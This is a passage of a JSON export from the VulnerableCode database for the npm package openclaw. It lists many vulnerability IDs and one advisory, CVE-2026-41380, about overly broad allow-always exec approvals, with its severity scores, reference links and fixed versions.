                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35620",
                "GHSA-39mp-545q-w789"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j96c-kau3-7fag"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89044?format=api",
            "vulnerability_id": "VCID-jbwa-scg3-efeq",
            "summary": "OpenClaw gateway exec allow-always over-trusts positional carrier executables\n## Summary\n\nAllow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers.\n\n## Impact\n\nA one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries.\n\n## Affected Component\n\n`src/infra/exec-approvals-allowlist.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41380",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08327",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08321",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08339",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41380"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41380",
                    "reference_id": "CVE-2026-41380",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41380"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p4x4-2r7f-wjxg",
                    "reference_id": "GHSA-p4x4-2r7f-wjxg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-p4x4-2r7f-wjxg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
